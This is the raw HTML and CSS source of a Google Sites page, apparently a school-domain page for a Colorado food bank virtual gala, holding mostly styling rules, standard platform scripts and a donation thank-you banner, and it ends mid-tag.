rgba(204,67,49,1); color: rgba(249,249,249,1); border-color: rgba(204,67,49,1);}.nyKByd .xkUom{background-color: rgba(0,0,0,0); color: rgba(249,249,249,1); border-color: rgba(249,249,249,1);}.nyKByd .KjwKmc{background-color: rgba(0,0,0,0); color: rgba(249,249,249,1); border-color: rgba(0,0,0,0);}.iwQgFb{background-color: rgba(0,0,0,0.150000006); height: 2.0px; margin-top: 8.5px;}.qeLZfd .iwQgFb{background-color: rgba(0,0,0,0.150000006); height: 2.0px; margin-top: 8.5px;}.lQAHbd .iwQgFb{background-color: rgba(255,255,255,0.200000003); height: 2.0px; margin-top: 8.5px;}.CbiMKe{background-color: rgba(204,67,49,1);}.qeLZfd .CbiMKe{background-color: rgba(204,67,49,1);}.lQAHbd .CbiMKe{background-color: rgba(204,67,49,1);}.tpmmCb .CbiMKe{background-color: rgba(204,67,49,1);}.nyKByd .CbiMKe{background-color: rgba(204,67,49,1);}.PsKE7e{font-family: Amiri;}.TlfmSc{font-family: Amiri;}.Zjiec{font-family: Amiri;}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.TlfmSc{font-size: 15.0pt;}}@media only screen and (min-width: 1280px){.TlfmSc{font-size: 15.0pt;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 16.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Zjiec{font-size: 20.0pt;}}@media only screen and (min-width: 1280px){.Zjiec{font-size: 20.0pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.PsKE7e{font-size: 12.0pt;}}@media only screen and (min-width: 1280px){.PsKE7e{font-size: 12.0pt;}}.IKA38e{margin-top: 16.0px;}.eWDljc{padding-top: 0; padding-bottom: 16.0px;}.Zjiec{margin: 48px 32px 62px 48px;}.XMyrgf{margin: 48px 32px 0 48px;}.JzO0Vc{background-color: rgba(28,28,28,1);}.zDUgLc{background-color: rgba(28,28,28,1);}.eWDljc{background-color: rgba(28,28,28,1);}.wgxiMe{background-color: rgba(28,28,28,1);}.YSH9J{color: rgba(249,249,249,1);}.oNsfjf{color: rgba(249,249,249,1);}.YSH9J:not(.iWs3gf):not(.TlfmSc):not(.M9vuGd):hover{color: rgba(249,249,249,0.8199999928);}.oNsfjf:not(.iWs3gf):not(.Zjiec):not(.lhZOrc):hover{color: rgba(249,249,249,0.8199999928);}.fOU46b .zDUgLc{opacity: 0;}.fOU46b .LBrwzc .zDUgLc{opacity: 1;}.fOU46b .GBy4H .zDUgLc{opacity: 1;}.fOU46b .HP6J1d .YSH9J{color: rgba(249,249,249,1);}.fOU46b .HP6J1d .PsKE7e.YSH9J:not(.M9vuGd):hover{color: rgba(249,249,249,0.8199999928);}.fOU46b .G8QRnc .YSH9J{color: rgba(28,28,28,1);}.fOU46b .G8QRnc .PsKE7e.YSH9J:not(.M9vuGd):hover{color: rgba(28,28,28,0.8199999928);}.fOU46b .usN8rf .YSH9J{color: rgba(28,28,28,1);}.fOU46b .usN8rf .PsKE7e.YSH9J:not(.M9vuGd):hover{color: rgba(28,28,28,0.8199999928);}.fOU46b .aCIEDd .YSH9J{color: rgba(28,28,28,1);}.fOU46b .aCIEDd .PsKE7e.YSH9J:not(.M9vuGd):hover{color: rgba(28,28,28,0.8199999928);}.fOU46b .a3ETed .YSH9J{color: rgba(249,249,249,1);}.fOU46b .a3ETed .PsKE7e.YSH9J:not(.M9vuGd):hover{color: rgba(249,249,249,0.8199999928);}.GBy4H .YSH9J{color: rgba(249,249,249,1);}.GBy4H .PsKE7e.YSH9J:not(.M9vuGd):hover{color: rgba(249,249,249,0.8199999928);}.LBrwzc .YSH9J{color: rgba(28,28,28,1);}.LBrwzc .PsKE7e.YSH9J:not(.M9vuGd):hover{color: rgba(28,28,28,0.8199999928);}.GBy4H .oNsfjf{color: rgba(249,249,249,1);}.GBy4H .PsKE7e.oNsfjf:not(.lhZOrc):hover{color: rgba(249,249,249,0.8199999928);}.LBrwzc .oNsfjf{color: rgba(28,28,28,1);}.LBrwzc .PsKE7e.oNsfjf:not(.lhZOrc):hover{color: rgba(28,28,28,0.8199999928);}.M9vuGd{font-weight: bold;}.lhZOrc{font-weight: bold;}.LB7kq{padding-bottom: 56px; padding-top: 56px;}.qnVSj{color: rgba(28,28,28,1);}.zfr3Q{color: rgba(28,28,28,1);}.qeLZfd .qnVSj{color: rgba(28,28,28,1);}.qeLZfd .zfr3Q{color: rgba(28,28,28,1);}.lQAHbd .qnVSj{color: rgba(249,249,249,1);}.lQAHbd .zfr3Q{color: rgba(249,249,249,1);}.tpmmCb .qnVSj{color: rgba(28,28,28,1);}.tpmmCb .zfr3Q{color: rgba(28,28,28,1);}.nyKByd .qnVSj{color: rgba(249,249,249,1);}.nyKByd .zfr3Q{color: rgba(249,249,249,1);}.qLrapd{color: rgba(204,67,49,1);}.duRjpb{color: rgba(204,67,49,1);}.duRjpb .OUGEr{color: rgba(204,67,49,1);}.qeLZfd .qLrapd{color: rgba(204,67,49,1);}.qeLZfd .duRjpb{color: rgba(204,67,49,1);}.qeLZfd .duRjpb .OUGEr{color: rgba(204,67,49,1);}.lQAHbd .qLrapd{color: rgba(249,249,249,1);}.lQAHbd .duRjpb{color: rgba(249,249,249,1);}.lQAHbd .duRjpb .OUGEr{color: rgba(249,249,249,1);}.tpmmCb .qLrapd{color: rgba(28,28,28,1);}.tpmmCb .duRjpb{color: rgba(28,28,28,1);}.tpmmCb .duRjpb .OUGEr{color: rgba(28,28,28,1);}.nyKByd .qLrapd{color: rgba(249,249,249,1);}.nyKByd .duRjpb{color: rgba(249,249,249,1);}.nyKByd .duRjpb .OUGEr{color: rgba(249,249,249,1);}.aHM7ed{color: rgba(204,67,49,1);}.JYVBee{color: rgba(204,67,49,1);}.JYVBee .OUGEr{color: rgba(204,67,49,1);}.qeLZfd .aHM7ed{color: rgba(204,67,49,1);}.qeLZfd .JYVBee{color: rgba(204,67,49,1);}.qeLZfd .JYVBee .OUGEr{color: rgba(204,67,49,1);}.lQAHbd .aHM7ed{color: rgba(249,249,249,1);}.lQAHbd .JYVBee{color: rgba(249,249,249,1);}.lQAHbd .JYVBee .OUGEr{color: rgba(249,249,249,1);}.tpmmCb .aHM7ed{color: rgba(28,28,28,1);}.tpmmCb .JYVBee{color: rgba(28,28,28,1);}.tpmmCb .JYVBee .OUGEr{color: rgba(28,28,28,1);}.nyKByd .aHM7ed{color: rgba(249,249,249,1);}.nyKByd .JYVBee{color: rgba(249,249,249,1);}.nyKByd .JYVBee .OUGEr{color: rgba(249,249,249,1);}.NHD4Gf{color: rgba(204,67,49,1);}.OmQG5e{color: rgba(204,67,49,1);}.OmQG5e .OUGEr{color: rgba(204,67,49,1);}.qeLZfd .NHD4Gf{color: rgba(28,28,28,1);}.qeLZfd .OmQG5e{color: rgba(28,28,28,1);}.qeLZfd .OmQG5e .OUGEr{color: rgba(28,28,28,1);}.lQAHbd .NHD4Gf{color: rgba(249,249,249,1);}.lQAHbd .OmQG5e{color: rgba(249,249,249,1);}.lQAHbd .OmQG5e .OUGEr{color: rgba(249,249,249,1);}.tpmmCb .NHD4Gf{color: rgba(28,28,28,1);}.tpmmCb .OmQG5e{color: rgba(28,28,28,1);}.tpmmCb .OmQG5e .OUGEr{color: rgba(28,28,28,1);}.nyKByd .NHD4Gf{color: rgba(249,249,249,1);}.nyKByd .OmQG5e{color: rgba(249,249,249,1);}.nyKByd .OmQG5e .OUGEr{color: rgba(249,249,249,1);}.Glwbz{color: rgba(28,28,28,1);}.TMjjoe{color: rgba(28,28,28,1);}.qeLZfd .Glwbz{color: rgba(28,28,28,1);}.qeLZfd .TMjjoe{color: rgba(28,28,28,1);}.lQAHbd .Glwbz{color: rgba(249,249,249,1);}.lQAHbd .TMjjoe{color: rgba(249,249,249,1);}.tpmmCb .Glwbz{color: rgba(28,28,28,1);}.tpmmCb .TMjjoe{color: rgba(28,28,28,1);}.nyKByd .Glwbz{color: rgba(249,249,249,1);}.nyKByd .TMjjoe{color: rgba(249,249,249,1);}.aw5Odc{color: rgba(204,67,49,1);}.qeLZfd .aw5Odc{color: rgba(28,28,28,1);}.lQAHbd .aw5Odc{color: rgba(249,249,249,1);}.tpmmCb .aw5Odc{color: rgba(28,28,28,1);}.nyKByd .aw5Odc{color: rgba(249,249,249,1);}.ImnMyf{color: rgba(28,28,28,1);}.Vs12Bd{color: rgba(28,28,28,1);}.S5d9Rd{color: rgba(249,249,249,1);}.yaqOZd:before{display: block; background-color: rgba(255,255,255,1);}.yaqOZd.qeLZfd:before{display: block; background-color: rgba(241,225,221,1);}.yaqOZd.lQAHbd:before{display: block; background-color: rgba(115,67,50,1);}.O13XJf{height: 340px;}.nyKByd .Wew9ke{fill: rgba(255,255,255,1);}.tpmmCb .Wew9ke{fill: rgba(0,0,0,0.5400000215);}@media only screen and (max-width: 479px){.O13XJf{height: 250px;}}.SBrW1{height: 430px;}.M63kCb{background-color: rgba(255,255,255,1);}.mtsG9b{background-color: rgba(0,0,0,0.0299999993); outline-color: rgba(0,0,0,0.1000000015);}.qeLZfd .mtsG9b{background-color: rgba(0,0,0,0.0299999993); outline-color: rgba(0,0,0,0.1000000015);}.lQAHbd .mtsG9b{background-color: rgba(255,255,255,0.200000003); outline-color: rgba(255,255,255,0.3199999928);}.ImnMyf{background-color: rgba(255,255,255,1);}.Vs12Bd{background-color: rgba(241,225,221,1);}.S5d9Rd{background-color: rgba(115,67,50,1);}.Wwnuce:not(.zX62Be){color: rgba(0,0,0,0.5400000215); fill: rgba(0,0,0,0.5400000215);}.qeLZfd .Wwnuce:not(.zX62Be){color: rgba(0,0,0,0.5400000215); fill: rgba(0,0,0,0.5400000215);}.lQAHbd .Wwnuce:not(.zX62Be){color: rgba(255,255,255,0.3199999928); fill: rgba(255,255,255,0.3199999928);}.tpmmCb .Wwnuce:not(.zX62Be){color: rgba(0,0,0,0.5400000215); fill: rgba(0,0,0,0.5400000215);}.nyKByd .Wwnuce:not(.zX62Be){color: rgba(255,255,255,0.3199999928); fill: rgba(255,255,255,0.3199999928);}.yaqOZd.O13XJf:before{background-color: rgba(204,67,49,1);}.CMArNe{background-color: rgba(204,67,49,1);}.CDt4Ke.zfr3Q{font-family: Amiri; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; text-decoration: none; display: block; line-height: 1.5; text-align: left; margin-left: 0.0pt; margin-right: 0.0pt; padding-left: 0.0pt; text-indent: 0.0pt; margin-top: 12.0pt; margin-bottom: 0.0pt; font-size: 12.0pt;}.TYR86d.zfr3Q{font-family: Amiri; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; font-size: 12.0pt;}.CDt4Ke.duRjpb{font-family: Amiko; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; text-decoration: none; display: block; line-height: 1.38; text-align: left; margin-left: 0.0pt; margin-right: 0.0pt; padding-left: 0.0pt; text-indent: 0.0pt; margin-top: 34.0pt; margin-bottom: 0.0pt;}.TYR86d.duRjpb{font-family: Amiko; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline;}.CDt4Ke.duRjpb{font-size: 34.0pt;}.TYR86d.duRjpb{font-size: 34.0pt;}@media only screen and (max-width: 479px){.CDt4Ke.duRjpb{font-size: 25.0pt;}}@media only screen and (max-width: 479px){.TYR86d.duRjpb{font-size: 25.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.CDt4Ke.duRjpb{font-size: 30.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TYR86d.duRjpb{font-size: 30.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.CDt4Ke.duRjpb{font-size: 34.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.TYR86d.duRjpb{font-size: 34.0pt;}}@media only screen and (min-width: 1280px){.CDt4Ke.duRjpb{font-size: 34.0pt;}}@media only screen and (min-width: 1280px){.TYR86d.duRjpb{font-size: 34.0pt;}}.CDt4Ke.JYVBee{font-family: Amiko; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; text-decoration: none; display: block; line-height: 1.5; text-align: left; margin-left: 0.0pt; margin-right: 0.0pt; padding-left: 0.0pt; text-indent: 0.0pt; margin-top: 18.0pt; margin-bottom: 0.0pt;}.TYR86d.JYVBee{font-family: Amiko; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline;}.CDt4Ke.JYVBee{font-size: 18.0pt;}.TYR86d.JYVBee{font-size: 18.0pt;}@media only screen and (max-width: 479px){.CDt4Ke.JYVBee{font-size: 17.0pt;}}@media only screen and (max-width: 479px){.TYR86d.JYVBee{font-size: 17.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.CDt4Ke.JYVBee{font-size: 17.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TYR86d.JYVBee{font-size: 17.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.CDt4Ke.JYVBee{font-size: 18.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.TYR86d.JYVBee{font-size: 18.0pt;}}@media only screen and (min-width: 1280px){.CDt4Ke.JYVBee{font-size: 18.0pt;}}@media only screen and (min-width: 1280px){.TYR86d.JYVBee{font-size: 18.0pt;}}.CDt4Ke.OmQG5e{font-family: Amiko; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; text-decoration: none; display: block; line-height: 1.5; text-align: left; margin-left: 0.0pt; margin-right: 0.0pt; padding-left: 0.0pt; text-indent: 0.0pt; margin-top: 14.0pt; margin-bottom: 0.0pt; font-size: 14.0pt;}.TYR86d.OmQG5e{font-family: Amiko; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; font-size: 14.0pt;}.CDt4Ke.TMjjoe{font-family: Amiri; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; text-decoration: none; display: block; line-height: 1.5; text-align: left; margin-left: 0.0pt; margin-right: 0.0pt; padding-left: 0.0pt; text-indent: 0.0pt; margin-top: 8.0pt; margin-bottom: 0.0pt; font-size: 8.0pt;}.TYR86d.TMjjoe{font-family: Amiri; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; font-size: 8.0pt;}.Y4CpGd{font-family: Amiri; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; font-size: 12.0pt;}.mTgrD{font-family: Amiri; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline;}.pBmh1{margin-top: 12.0pt; margin-bottom: 0.0pt;}.yQHJof{font-family: Amiri; font-weight: 400; font-style: normal; font-variant: normal; vertical-align: baseline; font-size: 8.0pt;}.QcmuFb{padding-left: 20px;}.RuayVd{padding-right: 20px;}.vDPrib{padding-left: 40px;}.YzcKX{padding-right: 40px;}.TBDXjd{padding-left: 60px;}.reTV0b{padding-right: 60px;}.bYeK8e{padding-left: 80px;}.vSYeUc{padding-right: 80px;}.CuqSDe{padding-left: 100px;}.PxtZIe{padding-right: 100px;}.Havqpe{padding-left: 120px;}.ahQMed{padding-right: 120px;}.JvDrRe{padding-left: 140px;}.rzhcXb{padding-right: 140px;}.o5lrIf{padding-left: 160px;}.PBhj0b{padding-right: 160px;}.yOJW7c{padding-left: 180px;}.TlN46c{padding-right: 180px;}.rB8cye{padding-left: 200px;}.GEdNnc{padding-right: 200px;}section[id="h.INITIAL_GRID.n3fzw246rj3t"] .IFuOkc:before{opacity: 0.0;}</style><script nonce="dJWtMAFtmjuzNhlJ8bIveA">_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,"v2",null,null,null,null,null,null,null,"https://content.googleapis.com","SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL1MGF1ekJwZ7ImMIsBqcBQsznld2L-cmkD1fvo3__hVRKGz2kgjuuVlAmTuk11wub40VroJ",1,"CKzFibfim_UCFYvETwodiz4BJA",1641425483752000,[5703839,5704621,5706832,5706836,5707711,5708870,5711808,5711977,5713207,5714550,5714628,5720060,5720927,5729666,5732944,5734573,5734956,5735808,5737339,5738511,5738531,5739804,5739899,5740816,5741777,5742464,5743126,5745624,5747265,5747743,5748031,5750554,5752696,5753008,5753331,5754231,5755040,14101306,14101502,14101510,14101530,14101534]],"AHL0AtJIu8EZKv94yZDQhDCZvsbjS2KbEQ:1641425483672",null,null,null,0,null,null,null,null,null,null,null,null,null,"https://drive.google.com",null,null,null,null,null,null,1,1,null,0,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"v2internal","https://docs.google.com",null,null,null,null,null,null,"https://sites.google.com/new/?authuser\u003d0",null,null,null,null,null,0,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,"",null,null,null,null,null,null,null,null,null,null,null,null,6,null,null,"https://accounts.google.com/o/oauth2/auth","https://accounts.google.com/o/oauth2/postmessageRelay",null,null,null,null,78,"https://sites.google.com/new/?authuser\u003d0\u0026usp\u003dviewer_footer\u0026authuser\u003d0",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,[],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"https://www.gstatic.com/atari/embeds/7925c5f8e01bacb9b4b0a3783ae0b867/intermediate-frame-minified.html",0,null,"v2beta",null,null,null,null,null,null,4,"https://accounts.google.com/o/oauth2/iframe",null,null,null,null,null,null,"https://597964177-atari-embeds.googleusercontent.com/embeds/16cb204cf3a9d4d223a0a3fd8b0eec5d/inner-frame-minified.html",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"https://sites.google.com/lpsk12.org/coloradofoodabankvirtualgala22/home",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0,null,null,null,null,null,null,0,null,"015epov1",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,1,null,null,[1641425483760,"atari_2021.50-Tue-0500_RC00","416272957","0",0,1],null,null,null,null,1,null,null,0,null,0,0,null,null,null,null,0,20,500,"https://domains.google.com",null,0,null,null,null,null,null,0,null,null,0,null,null,0,0,null,0,0,0,0,1,0,0]; window.globals = {"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"52cf826c547e26693831efcb95844ab08186349e9a69e5abc92a9c1fc6bd6291","normalizedPath":"lpsk12.org/coloradofoodabankvirtualgala22/home","pageTitle":"Home"}; function gapiLoaded() {if (globals.gapiLoaded == undefined) {globals.gapiLoaded = true;} else {globals.gapiLoaded();}}window.messages = []; window.addEventListener && window.addEventListener('message', function(e) {if (window.messages && e.data && e.data.magic == 'SHIC') {window.messages.push(e);}});</script><script src="https://apis.google.com/js/client.js?onload=gapiLoaded" nonce="dJWtMAFtmjuzNhlJ8bIveA"></script><script nonce="dJWtMAFtmjuzNhlJ8bIveA">(function(){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright 2011 Google LLC. SPDX-License-Identifier: Apache-2.0 */ /* Copyright 2013 Google LLC. SPDX-License-Identifier: Apache-2.0 */ /* Copyright 2020 Google LLC. SPDX-License-Identifier: Apache-2.0 */ var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;/* Copyright 2005 Google LLC. SPDX-License-Identifier: Apache-2.0 */ }).call(this); </script><script nonce="dJWtMAFtmjuzNhlJ8bIveA">const imageUrl = 'https:\/\/lh4.googleusercontent.com\/9lhhVkiT_eCVcC4OS4ACkNychxfCjMCwmWJy3WD6nem2A_T8tlGAA1yF_Lhkw3p4zn7ooa2GL0hW11ap7SxkIsM\x3dw16383'; function bgImgLoaded() { if (!globals.headerBgImgLoaded) { globals.headerBgImgLoaded = new Date().getTime(); } else { globals.headerBgImgLoaded(); } } if (imageUrl) { const img = new Image(); img.src = imageUrl; img.onload = bgImgLoaded; globals.headerBgImgExists = true; } else { globals.headerBgImgExists = false; } </script></head><body dir="ltr" itemscope itemtype="http://schema.org/WebPage" id="yDmH0d" css="yDmH0d"><div jscontroller="pc62j" jsmodel="iTeaXe" jsaction="rcuQ6b:WYd;GvneHb:og1FDd;vbaUQc:uAM5ec;YBArc:dj7Cne;"><div jscontroller="X4BaPc" jsaction="rcuQ6b:WYd;o6xM5b:Pg9eo;HuL2Hd:mHeCvf;VMhF5:FFYy5e;sk3Qmb:HI1Mdd;JIbuQc:rSzFEd(z2EeY),aSaF6e(ilzYPe);"><div jscontroller="o1L5Wb" data-sitename="coloradofoodabankvirtualgala22" data-domain="lpsk12.org" data-universe="1" jsmodel="fNFZH" jsaction="Pe9H6d:cZFEp;WMZaJ:VsGN3;hJluRd:UADL7b;zuqEgd:HI9w0;tr6QDd:Y8aXB;MxH79b:xDkBfb;JIbuQc:SPXMTb(uxAMZ);" jsname="G0jgYd"><div jsname="gYwusb" class="p9b27"></div><div jscontroller="RrXLpc" jsname="XeeWQc" role="banner" jsaction="keydown:uiKYid(OH0EC);rcuQ6b:WYd;zuqEgd:ufqpf;JIbuQc:XfTnxb(lfEfFf),AlTiYc(GeGHKb),AlTiYc(m1xNUe),zZlNMe(pZn8Oc);YqO5N:ELcyfe;"><div jsname="bF1uUb" class="BuY5Fd" jsaction="click:xVuwSc;"></div><div jsname="MVsrn" class="TbNlJb "><div role="button" class="U26fgb mUbCce fKz7Od h3nfre M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="GeGHKb" aria-label="Back to site" aria-disabled="false" tabindex="0" data-tooltip="Back to site" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot class="xjKiLb"><span class="Ce1Y1c" style="top: -12px"><svg class="V4YR2c" viewBox="0 0 24 24" focusable="false"><path d="M0 0h24v24H0z" fill="none"/><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/></svg></span></span></div><div class="E2UJ5" jsname="M6JdT"><div class="rFrNMe b7AJhc zKHdkd" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow jsname="OH0EC" aria-expanded="true"><div class="aCsJod oJeWuf"><div class="aXBtI I0VJ4d Wic03c"><span jsslot class="A37UZe qgcB3c iHd5yb"><div role="button" class="U26fgb mUbCce fKz7Od i3PoXe M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="lfEfFf" aria-label="Search" aria-disabled="false" tabindex="0" data-tooltip="Search" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot class="xjKiLb"><span class="Ce1Y1c" style="top: -12px"><svg class="vu8Pwe" viewBox="0 0 24 24" focusable="false"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg></span></span></div><div class="EmVfjc SKShhf" data-loadingmessage="Loading…" jscontroller="qAKInc" jsaction="animationend:kWijWc;dyRcpb:dyRcpb" jsname="aZ2wEe"><div class="Cg7hO" aria-live="assertive" jsname="vyyg5"></div><div jsname="Hxlbvc" class="xu46lf"><div class="ir3uv uWlRce co39ub"><div class="xq3j6 ERcjC"><div class="X6jHbb GOJTSe"></div></div><div class="HBnAAc"><div class="X6jHbb GOJTSe"></div></div><div class="xq3j6 dj3yTd"><div class="X6jHbb GOJTSe"></div></div></div><div class="ir3uv GFoASc Cn087"><div class="xq3j6 ERcjC"><div class="X6jHbb GOJTSe"></div></div><div class="HBnAAc"><div class="X6jHbb GOJTSe"></div></div><div class="xq3j6 dj3yTd"><div class="X6jHbb GOJTSe"></div></div></div><div class="ir3uv WpeOqd hfsr6b"><div class="xq3j6 ERcjC"><div class="X6jHbb GOJTSe"></div></div><div class="HBnAAc"><div class="X6jHbb GOJTSe"></div></div><div class="xq3j6 dj3yTd"><div class="X6jHbb GOJTSe"></div></div></div><div class="ir3uv rHV3jf EjXFBf"><div class="xq3j6 ERcjC"><div class="X6jHbb GOJTSe"></div></div><div class="HBnAAc"><div class="X6jHbb GOJTSe"></div></div><div class="xq3j6 dj3yTd"><div class="X6jHbb GOJTSe"></div></div></div></div></div><div role="button" class="U26fgb mUbCce fKz7Od JyJRXe M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="m1xNUe" aria-label="Back to site" aria-disabled="false" tabindex="0" data-tooltip="Back to site" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot class="xjKiLb"><span class="Ce1Y1c" style="top: -12px"><svg class="V4YR2c" viewBox="0 0 24 24" focusable="false"><path d="M0 0h24v24H0z" fill="none"/><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/></svg></span></span></div></span><div class="Xb9hP"><input type="search" class="whsOnd zHQkBf" jsname="YPqjbf" autocomplete="off" tabindex="0" aria-label="Search this site" value="" autofocus role="combobox" data-initial-value=""/><div jsname="LwH6nd" class="ndJi5d snByac" aria-hidden="true">Search this site</div></div><span jsslot class="A37UZe sxyYjd MQL3Ob"><div role="button" class="U26fgb mUbCce fKz7Od Kk06A M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="pZn8Oc" aria-label="Clear search" aria-disabled="false" tabindex="0" data-tooltip="Clear search" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"><div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot class="xjKiLb"><span class="Ce1Y1c" style="top: -12px"><svg class="fAUEUd" viewBox="0 0 24 24" focusable="false"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg></span></span></div></span><div class="i9lrp mIZh1c"></div><div jsname="XmnwAc" class="OabDMe cXrdqd"></div></div></div><div class="LXRPh"><div jsname="ty6ygf" class="ovnfwe Is7Fhb"></div></div></div></div></div></div></div><div jsname="tiN4bf"><div class="M63kCb"></div><div class="fktJzd AKpWA DdtOdf fOU46b Ly6Unf b2Iqye XeSM4" jsname="UzWXSb" data-uses-custom-theme="true" jscontroller="Md9ENb" jsaction="gsiSmd:Ffcznf;yj5fUd:cpPetb;HNXL3:q0Vyke;rcuQ6b:WYd;"><header id="atIdViewHeader"><div jscontroller="eFZtfd" jsaction="MxH79b:Xgd9s; click:Ptdedd;"><div jsname="NKtjmd" style="background-color: rgb(204, 67, 49);" class="vB4mjb QOTFId" role="region" aria-labelledby="i1" tabbable tabindex="0"><p style="color: rgb(255, 255, 255);" id="i1" class="Y4CpGd jCzMm">Thank you for donating to the Colorado Gala Food Bank!</p></div></div><div class="BbxBP HP6J1d" jsname="WA9qLc" jscontroller="RQOkef" jsaction="rcuQ6b:JdcaS;MxH79b:JdcaS;VbOlFf:ywL4Jf;FaOgy:ywL4Jf; keydown:Hq2uPe; wheel:Ut4Ahc;" data-top-navigation="false" data-is-preview="false"><div class="DXsoRd YTv4We oNsfjf" role="button" tabindex="0" jsaction="click:LUvzV" jsname="z4Tpl" id="s9iPrd" aria-haspopup="true" aria-controls="yuynLe" aria-expanded="false"><svg 